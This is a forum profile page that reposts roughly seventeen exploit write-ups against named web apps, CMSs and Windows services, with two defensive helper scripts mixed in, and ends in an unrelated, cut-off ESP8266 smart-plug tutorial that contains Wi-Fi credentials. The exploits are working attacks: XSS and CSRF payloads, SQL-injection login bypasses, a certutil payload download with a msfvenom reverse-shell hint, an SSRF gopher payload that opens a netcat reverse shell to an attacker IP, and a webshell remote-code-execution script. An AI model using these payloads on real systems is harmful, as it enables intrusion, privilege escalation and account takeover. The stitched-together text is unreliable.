HireHackking

Everything posted by HireHackking

  1. # Exploit Title: Expense Management System - 'description' Stored Cross Site Scripting
     # Date: 02/12/2020
     # Exploit Author: Nikhil Kumar
     # Vendor Homepage: http://egavilanmedia.com/
     # Software Link: http://egavilanmedia.com/expense-management-system/
     # Tested On: Ubuntu

     Vulnerable Parameter: "description="

     Steps to Reproduce:
     1. Open the index.php page using the following URL http://localhost/Expense-Management-System/index.php and click on Add Expense
     2. Put a payload in the "description=" parameter

     Payload :- test"><script>alert("XSS")</script>

     Malicious Request::

     POST /Expense-Management-System/expense_action.php HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
     Accept: application/json, text/javascript, */*; q=0.01
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     X-Requested-With: XMLHttpRequest
     Content-Length: 140
     Origin: http://localhost
     DNT: 1
     Connection: close
     Referer: http://localhost/Expense-Management-System/
     Cookie: PHPSESSID=45f122ec98900409467ac74f6113ff4a

     description=test%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&amount=1234&date=2020%2F11%2F17&expense_id=&action=Add
  2. # Exploit Title: Tendenci 12.3.1 - CSV/ Formula Injection
     # Date: 2020-10-29
     # Exploit Author: Mufaddal Masalawala
     # Vendor Homepage: https://www.tendenci.com/
     # Software Link: https://github.com/tendenci/tendenci
     # Version: 12.3.1
     # Payload: =10+20+cmd|' /C calc'!A0
     # Tested on: Kali Linux 2020.3

     # Proof Of Concept:
     CSV Injection (aka Excel Macro Injection or Formula Injection) exists in the Contact Us feature in Tendenci v12.3.1 via the message field, which is mishandled while exporting to a CSV file.

     To exploit this vulnerability:
     1. Go to the contact us page, enter the payload "=10+20+cmd|' /C calc'!A0" in the message field and submit the form
     2. Log in to the application, go to the Forms section and export the contact us form entries
     3. Click on Export and save the downloaded CSV file
     4. Open the CSV file, allow all popups, and our payload is executed (the calculator is opened).
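     The defensive counterpart to the post above, added here as an example (not Tendenci's code): an export routine that neutralizes cells beginning with a formula trigger before writing the CSV, so a spreadsheet shows the message as text. The sample entries are constructed; the only real value is the payload string quoted in the post.

     ```python
     import csv
     import io

     # Leading characters that make Excel/LibreOffice evaluate a cell as a formula.
     # Tab/CR/LF are included because spreadsheets trim leading whitespace first.
     FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")


     def neutralize_cell(value):
         """Return `value` as a string that a spreadsheet will display literally."""
         text = "" if value is None else str(value)
         if text.startswith(FORMULA_TRIGGERS):
             # A leading apostrophe forces text rendering; the apostrophe itself is hidden.
             text = "'" + text
         return text


     def export_rows(rows, fieldnames):
         """Serialize `rows` to CSV text with every cell neutralized and quoted."""
         buf = io.StringIO()
         writer = csv.DictWriter(buf, fieldnames=fieldnames,
                                 quoting=csv.QUOTE_ALL, lineterminator="\n")
         writer.writeheader()
         for row in rows:
             writer.writerow({k: neutralize_cell(row.get(k)) for k in fieldnames})
         return buf.getvalue()


     # Constructed sample: two harmless entries and the payload from the post.
     SAMPLE_ENTRIES = [
         {"name": "Alice", "message": "Hello, I have a question about pricing."},
         {"name": "Mallory", "message": "=10+20+cmd|' /C calc'!A0"},
         {"name": "Bob", "message": "-5 degrees outside today"},
     ]

     if __name__ == "__main__":
         print(export_rows(SAMPLE_ENTRIES, ["name", "message"]))
     ```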
  3. # Exploit Title: Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path
     # Date: 2020-08-28
     # Exploit Author: Metin Yunus Kandemir
     # Vendor Homepage: https://www.intel.com/
     # Version: v5.2
     # Tested on: Windows 7
     # Source: https://www.totalpentest.com/post/intel-r-user-notification-service-unquoted-service-path-privilege-escalation

     @ECHO OFF
     ECHO =======================================================================================================================
     ECHO INTEL(R) MANAGEMENT AND SECURITY APPLICATION USER NOTIFICATION SERVICE 5.2 - Unquoted Service Path Privilege Escalation
     ECHO =======================================================================================================================
     ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
     wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
     sc qc UNS
     ECHO [+] Your mandatory level is:
     whoami /groups | findstr /B /C:"Mandatory Label"
     ::Create Privacy.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell.
     ::msfvenom -p windows/shell/reverse_tcp LHOST=<Your IP Address> LPORT=443 -f exe > Privacy.exe
     ECHO [?]
     ECHO [+] Enumeration was completed successfully.
     ECHO [?] If you create Privacy.exe under Intel directory with your privileges, you might be able to get SYSTEM reverse shell after windows was rebooted.
     PAUSE
     certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/Privacy.exe "C:\Program Files (x86)\Common Files\Intel\Privacy.exe"
     IF EXIST "C:\Program Files (x86)\Common Files\Intel\Privacy.exe" (
         ECHO [+] The download was successful.
     ) ELSE (
         ECHO [-] The download was unsuccessful.
         PAUSE
     )
     ECHO [!] If you continue, system will reboot.
     PAUSE
     shutdown /r /t 0
     ::code end

     #Exploit:
     A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  4. # Exploit Title: aSc TimeTables 2021.6.2 - Denial of Service (PoC)
     # Date: 2020-01-12
     # Exploit Author: Ismael Nava
     # Vendor Homepage: https://www.asctimetables.com/#!/home
     # Software Link: https://www.asctimetables.com/#!/home/download
     # Version: 2021.6.2
     # Tested on: Windows 10 Home x64

     # STEPS
     # Open the program aSc Timetables 2021
     # In File select the option New
     # Put any letter in the field Name of the School and click Next
     # In the next window click NEXT
     # In Step 3, in Subject click on New
     # Run the python exploit script, it will create a new .txt file
     # Copy the content of the file "Metoo.txt"
     # Paste the content in the field Subject title
     # Click on OK
     # End :)

     buffer = 'Z' * 10000

     try:
         file = open("Metoo.txt", "w")
         file.write(buffer)
         file.close()
         print("Archive ready")
     except:
         print("Archive not ready")
  5. # Exploit Title: ILIAS Learning Management System 4.3 - SSRF
     # Date: 10-08-2020
     # Exploit Author: Dot/kx1z0
     # Vendor Homepage: https://www.ilias.de/
     # Software Link: https://github.com/ILIAS-eLearning/ILIAS/tree/release_4-3
     # Version: 4.3-5.1
     # Tested on: Linux

     # Description
     We can create portfolios, export them to PDF and download them. The issue is that there is an HTML injection, and if we inject HTML into the portfolio, it will be rendered when it is exported to PDF. So we can take advantage of the fact that it is running under the file:// wrapper to inject an XMLHttpRequest requesting the local file we want, so that when we download the PDF we can see the content of that file.

     # Exploit
     We cannot inject the XMLHttpRequest directly into the content of the portfolio, as there is something blocking it. So we will have to host a script on our own server and invoke it from the portfolio.

     We insert this in the portfolio:

     <script src=host.com/test.js> </script>

     Script on our server:

     x=new XMLHttpRequest;
     x.onload=function(){ document.write(this.responseText) };
     x.open("GET","file:///etc/passwd");
     x.send();

     So, finally, we will only have to download the PDF and there will be the content of the file we have requested.
  6. # Exploit Title: Student Result Management System 1.0 - Authentication Bypass SQL Injection
     # Google Dork: N/A
     # Date: 11/16/2020
     # Exploit Author: Ritesh Gohil
     # Vendor Homepage: https://projectnotes.org/it-projects/student-result-management-system-in-php-with-source-code/
     # Software Link: https://projectnotes.org/download/studentms-zip/
     # Version: 1.0
     # Tested on: Win10 x64, Kali Linux x64
     # CVE : N/A

     ######## Description #################################################################
     #                                                                                    #
     #  An SQL injection vulnerability discovered in PHP Student Result Management System #
     #                                                                                    #
     #  Admin Login Portal is vulnerable to SQL Injection                                 #
     #                                                                                    #
     #  The vulnerability could allow for the improper neutralization of special elements #
     #  in SQL commands and may lead to the product being vulnerable to SQL injection.    #
     #                                                                                    #
     ######################################################################################

     Kindly follow the steps below:
     1. Visit the main page of the Student Result Management System.
     2. You will get an Admin Login Page.
     3. Payload which you can use in the Email and password fields: AND 1=0 AND '%'='
     4. You will get Admin Access to the Student Result Management System.
  7. # Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF
     # Date: 01-12-2020
     # Exploit Author: Hardik Solanki
     # Vendor Homepage: http://egavilanmedia.com
     # Software Link: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php
     # Version: 1.0
     # Tested on Windows 10

     CSRF ATTACK:
     Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same-origin policy, which is designed to prevent different websites from interfering with each other.

     Attack Vector:
     An attacker can update any user's account. (Note: the FULL NAME field is also vulnerable to stored XSS & the attacker can steal the authenticated session of the user)

     Steps to reproduce:
     1. Open the user login page using the following URL:
        -> http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/login.html
     2. Now log in with the "attacker" user account & navigate to the edit profile tab. Click on the "Update" button and intercept the request in the web proxy tool "Burp Suite".
     3. Generate the CSRF PoC from the Burp tool. Copy the URL or copy the code below.

     <html>
       <!-- CSRF PoC - generated by Burp Suite Professional -->
       <body>
       <script>history.pushState('', '', '/')</script>
         <form action="http://localhost/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile_action.php" method="POST">
           <input type="hidden" name="fullname" value="Attacker" />
           <input type="hidden" name="username" value="hunterr" />
           <input type="hidden" name="email" value="noooobhunter&#64;gmail&#46;com" />
           <input type="hidden" name="gender" value="Male" />
           <input type="hidden" name="action" value="update&#95;user" />
           <input type="submit" value="Submit request" />
         </form>
       </body>
     </html>

     4. Now, log in with the "Victim/Normal user" account (assume that user is currently authenticated in the browser).
     5. Paste the URL copied in step 3 in the browser, OR submit the CSRF PoC code shown in step 3.
     6. We receive a "Status: Success", which indicates that the CSRF attack is successfully done & the attacker can take over the user account via stored XSS (steal the authenticated cookies of the user from the "FULL NAME" parameter).

     IMPACT:
     An attacker can take over any user account. (Note: the FULL NAME field is also vulnerable to stored XSS & the attacker can steal the authenticated session of the user)
  8. # Exploit Title: Under Construction Page with CPanel 1.0 - SQL injection
     # Date: 17-11-2020
     # Exploit Author: Mayur Parmar(th3cyb3rc0p)
     # Vendor Homepage: http://egavilanmedia.com
     # Software Link : http://egavilanmedia.com/under-construction-page-with-cpanel/
     # Version: 1.0
     # Tested on: PopOS

     SQL Injection:
     SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve some sensitive information, like database structure, tables, columns, and their underlying data.

     Attack Vector:
     An attacker can gain admin panel access using malicious SQL injection queries.

     Steps to reproduce:
     1. Open the admin login page using the following URL:
        -> http://localhost/Under%20Construction/admin/login.php
     2. Now put the payload below in both fields (User ID & Password)
        Payload: admin' or '1'='1
     3. The server accepted our payload and we bypassed cpanel without any credentials
  9. # Exploit Title: Pharmacy Store Management System 1.0 - 'id' SQL Injection
     # Google Dork: N/A
     # Date: 1.12.2020
     # Exploit Author: Aydın Baran Ertemir
     # Vendor Homepage: https://www.sourcecodester.com/php/13225/pharmacy-store-management-system.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=13225&title=Pharmacy+Store+Management+System+in+PHP+with+Source+Code
     # Version: 1.0
     # Tested on: Kali Linux

     Use SQLMAP:

     sqlmap -u 'http://localhost/pharmacy1/admin/edituser?id=1' --dbs --batch
  10. # Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting
      # Exploit Author: Soushikta Chowdhury
      # Vendor Homepage: http://egavilanmedia.com
      # Software Link: http://egavilanmedia.com/user-registration-and-login-system-with-admin-panel/
      # Version: 1.0
      # Tested on: Windows 10
      # Contact: https://www.linkedin.com/in/soushikta-chowdhury/

      Vulnerable Parameters: Full Name

      Steps to reproduce:
      1. Go to the registration page
      2. Fill in the details & put the <script>alert("soushikta")</script> payload in Full Name.
      3. Now go to the Admin Panel. After entering, go to Manage Users and go to the last page to check the newly added user. We can see that our payload gets executed.
  11. # Exploit Title: WonderCMS 3.1.3 - Authenticated SSRF to Remote Code Execution
      # Date: 2020-11-27
      # Exploit Author: zetc0de
      # Vendor Homepage: https://www.wondercms.com/
      # Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
      # Version: 3.1.3
      # Tested on: Ubuntu 16.04
      # CVE : CVE-2020-35313

      # WonderCMS is vulnerable to an SSRF vulnerability.
      # In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.
      # The theme/plugin installer does not sanitize the destination of the github/gitlab URL, so an attacker can point the destination to localhost.
      # When the attacker can point the request to localhost, this leads to an SSRF vulnerability.
      # The highest impact leads to RCE with the gopher scheme and FastCGI running on port 9000.
      #
      # python exploit.py
      # [+] Getting Token
      # [+] Sending payload
      # [+] Get reverse shell
      # nc -lnvp 1234
      # Connection from 192.168.43.103:56956
      # /bin/sh: 0: can't access tty; job control turned off
      # $ whoami
      # www-data
      # $

      import requests
      from bs4 import BeautifulSoup
      from termcolor import colored
      from time import sleep

      print(colored('''
       \ \      /_ \  \ | _ \ __| _ \ __|  \  | __|
        \ \ \  /( |. | | |_| / ( |\/ |\__ \
         \_/\_/\___/_|\_|___/___|_|_\\___|_| _|____/
      ------[ SSRF to Remote Code Execution ]------
      ''', "blue"))

      loginURL = "http://wonder.com/loginURL"
      password = "GpIyq0RH"
      lhost = "192.168.43.66"
      lport = "1234"

      payload = "gopher://127.0.0.1:9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH132%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/usr/share/php/PEAR.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2584%2504%2500%253C%253Fphp%2520system%2528%2527rm%2520/tmp/f%253Bmkfifo%2520/tmp/f%253Bcat%2520/tmp/f%257C/bin/sh%2520-i%25202%253E%25261%257Cnc%2520{}%2520{}%2520%253E/tmp/f%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500".format(lhost, lport)

      r = requests.session()
      data = {"password": password}
      page = r.post(loginURL, data)
      if "Wrong" in page.text:
          print(colored("[!] Exploit Failed : Wrong Credential", "red"))
          exit()

      print(colored("[+] Getting Token", "cyan"))
      soup = BeautifulSoup(page.text, "html.parser")
      allscript = soup.find_all("script")
      no = 0
      for i in allscript:
          if "rootURL" in str(i):
              url = i.string.split("=")[1].replace('"', '').strip(";").lstrip(" ")
          elif "token" in str(i):
              token = i.string.split("=")[1].replace('"', '').strip(";").lstrip(" ")


      def sendPayload(req, url, payload, token):
          getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token
          req.get(getShell)


      print(colored("[+] Sending payload", "cyan"))
      sleep(1)
      print(colored("[+] Get reverse shell", "cyan"))
      sendPayload(r, url, payload, token)
      print(colored("[+] Good bye", "cyan"))
  12. # Exploit Title: IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path
      # Discovery by: Manuel Alvarez
      # Software link: https://www.pconlife.com/download/otherfile/20566/e82994866a370a480607637f28b82835/
      # Discovery Date: 2020-11-27
      # Tested Version: 1.0.6433.0
      # Vulnerability Type: Unquoted Service Path
      # Tested on OS: Windows 10 x64 es

      # Step to discover Unquoted Service Path:

      C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """
      Audio service    STacSV    c:\Program Files\IDT\WDM\STacSV64.exe    Auto

      # Service info:

      C:\>sc qc StacSV
      [SC] QueryServiceConfig CORRECTO

      NOMBRE_SERVICIO: StacSV
              TIPO               : 10  WIN32_OWN_PROCESS
              TIPO_INICIO        : 2   AUTO_START
              CONTROL_ERROR      : 1   NORMAL
              NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\STacSV64.exe
              GRUPO_ORDEN_CARGA  : AudioGroup
              ETIQUETA           : 0
              NOMBRE_MOSTRAR     : Audio Service
              DEPENDENCIAS       :
              NOMBRE_INICIO_SERVICIO: LocalSystem

      #Exploit:
      A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  13. # Exploit Title: PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS
      # Date: 2/12/2020
      # Exploit Author: Amin Rawah
      # Vendor Homepage: https://www.paessler.com/prtg
      # Software Link: https://www.paessler.com/prtg
      # Version: 20.4.63.1412 x64
      # Tested on: Windows
      # CVE : CVE-2020-14073

      Description:
      Since there is a stored XSS affecting 'maps' in the system, a malicious user can escalate his/her privilege to PRTG Administrator.

      Steps:
      1- Log in to the PRTG system and view the source code (currentUserId)
      2- Create a map, add an element, double click the element and modify the HTML section 'HTML After'
      3- In 'HTML After' add the following code:

      <form action="http://<PRTG_SERVER>:8081/editsettings" method="POST" enctype="multipart/form-data">
        <input type="hidden" name="name&#95;" value="PRTG&#32;Administrators" />
        <input type="hidden" name="defaulthome&#95;" value="&#47;welcome&#46;htm" />
        <input type="hidden" name="isadgroup" value="0" />
        <input type="hidden" name="adusertype&#95;" value="0" />
        <input type="hidden" name="aduserack&#95;" value="0" />
        <input type="hidden" name="users&#95;" value="1" />
        <input type="hidden" name="users&#95;" value="1" />
        <input type="hidden" name="users&#95;&#95;check" value="<currentUserId>&#124;<YOUR_USERNAME>&#124;" />
        <input type="hidden" name="users&#95;&#95;check" value="100&#124;PRTG&#32;System&#32;Administrator&#124;" />
        <input type="hidden" name="id" value="200" />
        <input type="hidden" name="targeturl" value="&#47;systemsetup&#46;htm&#63;tabid&#61;6" />
        <input type="submit" value="Submit request" />
      </form>
      <svg/onload='document.forms[0].submit()'/>

      4- Save and share the link with a PRTG Administrator.
      5- Log in with the highest privilege.
  14. # Exploit Title: WonderCMS 3.1.3 - Authenticated Remote Code Execution
      # Date: 2020-11-27
      # Exploit Author: zetc0de
      # Vendor Homepage: https://www.wondercms.com/
      # Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
      # Version: 3.1.3
      # Tested on: Ubuntu 16.04
      # CVE : CVE-2020-35314

      # WonderCMS is vulnerable to Authenticated Remote Code Execution.
      # In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.
      # Using the theme/plugin installer, an attacker can install a crafted plugin that contains a webshell and get RCE.

      # python3 exploit.py http://wonder.com/loginURL GpIyq0RH
      # -------------
      # [+] Getting Token
      # [+] Sending Payload
      # [+] Get the shell
      # [+] Enjoy!
      # $id
      # uid=33(www-data) gid=33(www-data) groups=33(www-data)

      import requests
      import sys
      import re
      from bs4 import BeautifulSoup
      from termcolor import colored

      print(colored('''
       \ \      /_ \  \ | _ \ __| _ \ __|  \  | __|
        \ \ \  /( |. | | |_| / ( |\/ |\__ \
         \_/\_/\___/_|\_|___/___|_|_\\___|_| _|____/
      ------[ Auth Remote Code Execution ]------
      ''', "blue"))

      if len(sys.argv) != 3:
          print(colored("[-] Usage : ./wonder.py loginURL password", "red"))
          exit()

      loginURL = sys.argv[1]
      password = sys.argv[2]

      r = requests.session()
      data = {"password": password}
      page = r.post(loginURL, data)
      if "Wrong" in page.text:
          print(colored("[!] Exploit Failed : Wrong Credential", "red"))
          exit()

      print(colored("[+] Getting Token", "blue"))
      soup = BeautifulSoup(page.text, "html.parser")
      allscript = soup.find_all("script")
      no = 0
      for i in allscript:
          if "rootURL" in str(i):
              url = i.string.split("=")[1].replace('"', '').strip(";").lstrip(" ")
          elif "token" in str(i):
              token = i.string.split("=")[1].replace('"', '').strip(";").lstrip(" ")

      payload = "https://github.com/zetc0de/wonderplugin/archive/master.zip"


      def sendPayload(req, url, payload, token):
          getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token
          req.get(getShell)
          shell = url + "plugins/wonderplugin/evil.php"
          checkshell = req.get(shell)
          if "1337" in checkshell.text:
              return True
          else:
              return False


      print(colored("[+] Sending Payload", "blue"))
      shell = sendPayload(r, url, payload, token)
      if shell == True:
          print(colored("[+] Get the shell", "blue"))
          print(colored("[+] Enjoy!", "blue"))
          shell = url + "plugins/wonderplugin/evil.php"
          while True:
              cmd = input("$")
              data = {"cmd": cmd}
              res = r.post(shell, data)
              if res.status_code == 200:
                  print(res.text)
      elif shell == False:
          print(colored("[+] Get the shell", "blue"))
          print(colored("[+] Enjoy!", "blue"))
          shell = url + "plugins/wonderplugin-master/evil.php"
          while True:
              cmd = input("$")
              data = {"cmd": cmd}
              res = r.post(shell, data)
              if res.status_code == 200:
                  print(res.text)
      else:
          print(colored("[!] Failed to exploit", "red"))
  15. # Exploit Title: Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path
      # Discovery by: Manuel Alvarez
      # Discovery Date: 2020-11-07
      # Vendor Homepage: https://www.realtek.com/en/
      # Tested Version: 1.0.64.7
      # Vulnerability Type: Unquoted Service Path
      # Tested on OS: Windows 10 x64 es

      # Step to discover Unquoted Service Path:

      C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """
      Andrea RT Filters Service    AERTFilters    C:\Program Files\IDT\WDM\AESTSr64.exe    Auto

      # Service info:

      C:\Users\ComoDVD>sc qc AESTFilters
      [SC] QueryServiceConfig CORRECTO

      NOMBRE_SERVICIO: AESTFilters
              TIPO               : 10  WIN32_OWN_PROCESS
              TIPO_INICIO        : 2   AUTO_START
              CONTROL_ERROR      : 1   NORMAL
              NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
              GRUPO_ORDEN_CARGA  :
              ETIQUETA           : 0
              NOMBRE_MOSTRAR     : Andrea ST Filters Service
              DEPENDENCIAS       :
              NOMBRE_INICIO_SERVICIO: LocalSystem

      #Exploit:
      A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
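      A defender-side check for the unquoted-path condition described in items 3, 12 and 15, added here as an example (not code from any of those posts): it parses `wmic service get name,pathname,displayname,startmode` output, flags services whose unquoted executable path contains a space, and emits the `sc config ... binPath=` command that adds the quotes. The output text is constructed; the two IDT rows are taken from the posts, the rest are made up to cover the quoted, no-space and non-Auto cases.

      ```python
      import re

      # Constructed sample of wmic output. Columns are separated by two or more
      # spaces, which is how the parser below tells them apart.
      SAMPLE_WMIC_OUTPUT = """\
      DisplayName                  Name         PathName                                          StartMode
      Audio service                STacSV       c:\\Program Files\\IDT\\WDM\\STacSV64.exe            Auto
      Andrea RT Filters Service    AERTFilters  C:\\Program Files\\IDT\\WDM\\AESTSr64.exe            Auto
      Example Quoted Service       QuotedSvc    "C:\\Program Files\\Example\\svc.exe" -k netsvcs    Auto
      Windows Update               wuauserv     C:\\Windows\\system32\\svchost.exe -k netsvcs       Manual
      Demand Service               DemandSvc    C:\\Demand Tools\\demand.exe                        Manual
      """

      # The executable ends at the first ".exe" followed by whitespace or end of string;
      # whatever follows is treated as arguments.
      EXE_RE = re.compile(r"^(.*?\.exe)(?:\s|$)", re.IGNORECASE)


      def executable_part(pathname):
          """Return the executable portion of a service PathName, arguments stripped."""
          m = EXE_RE.match(pathname.strip())
          return m.group(1) if m else pathname.strip()


      def is_unquoted_with_spaces(pathname):
          """True when the path is not quoted and the executable path contains a space."""
          p = pathname.strip()
          if not p or p.startswith('"'):
              return False
          return " " in executable_part(p)


      def remediation_command(name, pathname):
          """Build the sc config command that quotes the binary (space after '=' required)."""
          exe = executable_part(pathname)
          args = pathname.strip()[len(exe):]
          return 'sc config {} binPath= "\\"{}\\"{}"'.format(name, exe, args)


      def find_unquoted_services(wmic_text):
          """Parse wmic output and return one finding per risky service."""
          findings = []
          for line in wmic_text.splitlines()[1:]:  # skip the column header
              cols = re.split(r"\s{2,}", line.strip())
              if len(cols) != 4:
                  continue
              display, name, path, startmode = cols
              if is_unquoted_with_spaces(path):
                  findings.append({
                      "name": name,
                      "display": display,
                      "path": path,
                      # Auto-start services run as their account (often SYSTEM) at boot
                      # without any user action, which is what makes them the priority.
                      "auto_start": startmode.lower() == "auto",
                      "fix": remediation_command(name, path),
                  })
          return findings


      if __name__ == "__main__":
          for f in find_unquoted_services(SAMPLE_WMIC_OUTPUT):
              flag = "AUTO" if f["auto_start"] else "manual"
              print("[{}] {} -> {}\n    fix: {}".format(flag, f["name"], f["path"], f["fix"]))
      ```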
  16. # Exploit Title: Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting
      # Date: 27-11-2020
      # Exploit Author: Sagar Banwa
      # Vendor Homepage: https://projectworlds.in/
      # Software Link: https://projectworlds.in/free-projects/php-projects/online-voting-system-project-in-php-2/
      # Tested on: Windows 10/Kali Linux

      Steps-To-Reproduce:
      1. Go to register
      2. Add the payload in Username: <script>alert(1)</script>
      3. And complete the registration
      4. Log in to the account

      POST /vote/reg_action.php HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 593
      Origin: http://localhost
      Connection: close
      Referer: http://localhost/vote/register.php
      Cookie: PHPSESSID=1sqkq0u1m2j47906htd45opcep
      Upgrade-Insecure-Requests: 1

      firstname=user1&lastname=user2&username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=testtest&g-recaptcha-response=03AGdBq24TB5LilE4y9YCZx4I_XrKLBs2ftYrVEJ70_vhpDG-FXCKhzfB-EmAD-NnhKRSZ8_A88_ZNB4nXnwMBs8cU1Qgrqzs8Yme0Bmral8WRK1umGikJeDzliuigIKgZ6Q2Me9zGS-ecZyrujgF4tKSlMs3K_KNgVhEhlAsslrfBe7jQg40aG3PdMCXTTOst4Lt91vswl1G_dmYjrLEh7AfLJS7XYgXrEt4Pfau_mJ3KzE_hf-MxbpTI9_NkCLanUiW8-VI1t3uopUbSE9xH53X1cUExoe_dGpwnkygZw_4yEDp-iBYA73wql5ow1W43OIn5pmSBz_Sdv1VbfAqbFMEIXXJx4o5D_TLiVKLDQCj2Vy-fRmohlpYwV76NR5Iu2D693FKCs3KODRNSaitpOevSfcYh3h05vCGuPSO1fCu4c3v1daiIdFKPwDvfKS_Lm8jgoFK4kfnZ&submit=Next
  17. # Exploit Title: Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting
      # Date: 24-11-2020
      # Exploit Author: Parshwa Bhavsar
      # Vendor Homepage: https://www.sourcecodester.com/php/14600/online-news-portal-using-phpmysqli-source-code.html
      # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip
      # Version: 1.0
      # Tested on: Windows 10/XAMPP

      Stored Cross-site scripting (XSS):
      Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.

      Attack Vector:
      This vulnerability allows the attacker to inject the XSS payload in the Title field of the page, and each time any user opens the website the XSS triggers and the attacker is able to steal the cookie according to the crafted payload.

      Vulnerable Parameters: Title parameter in the Edit Post page.

      Payload : "><img src=x Onmouseover=alert(document.domain)>

      Vulnerable URL : http://localhost/online-news-portal/news_portal/admin/index.php?page=new_post

      Steps To Reproduce :
      1) Go to the admin Dashboard
      2) Click on Posts and click the Add New button.
      3) Put the payload into the Title parameter.
      4) Click on Save.
      5) The XSS payload will be triggered.
  18. In this article, we will combine an esp8266 with relays to make a simple smart plug-in board.

      Route Map

      Practical objects

      Code

      #define BLINKER_PRINT Serial
      #define BLINKER_WIFI
      #define BLINKER_MIOT_LIGHT

      #include <Blinker.h>

      char auth[] = "3aa44d779593";
      char ssid[] = "PDCN";
      char pswd[] = "1234567890";

      // Create new component objects
      BlinkerButton Button1("btn-abc");
      BlinkerNumber Number1("num-abc");

      int counter = 0;

      // Executed when the app button is pressed: toggle the LED/relay pin
      void button1_callback(const String & state)
      {
          BLINKER_LOG("get button state: ", state);
          digitalWrite(LED_BUILTIN, !digitalRead(LED_BUILTIN));
      }

      // Executed when data arrives for a component that has no bound callback
      void dataRead(const String & data)
      {
          BLINKER_LOG("Blinker readString: ", data);
          counter++;
          Number1.print(counter);
      }

      // Power command from the Mi Home (MIOT) side.
      // LED_BUILTIN on the ESP8266 board is active-low, so LOW means on.
      // The state reported back must match the command so the app shows the right state.
      void miotPowerState2(const String & state)
      {
          BLINKER_LOG("need set power state: ", state);

          if (state == BLINKER_CMD_ON) {
              digitalWrite(LED_BUILTIN, LOW);
              BlinkerMIOT.powerState("on");
              BlinkerMIOT.print();
          }
          else if (state == BLINKER_CMD_OFF) {
              digitalWrite(LED_BUILTIN, HIGH);
              BlinkerMIOT.powerState("off");
              BlinkerMIOT.print();
          }
      }

      void setup()
      {
          // Initialize the serial port
          Serial.begin(115200);

      #if defined(BLINKER_PRINT)
          BLINKER_DEBUG.stream(BLINKER_PRINT);
      #endif

          // Initialize the IO with the LED (off at start: active-low)
          pinMode(LED_BUILTIN, OUTPUT);
          digitalWrite(LED_BUILTIN, HIGH);

          // Initialize blinker
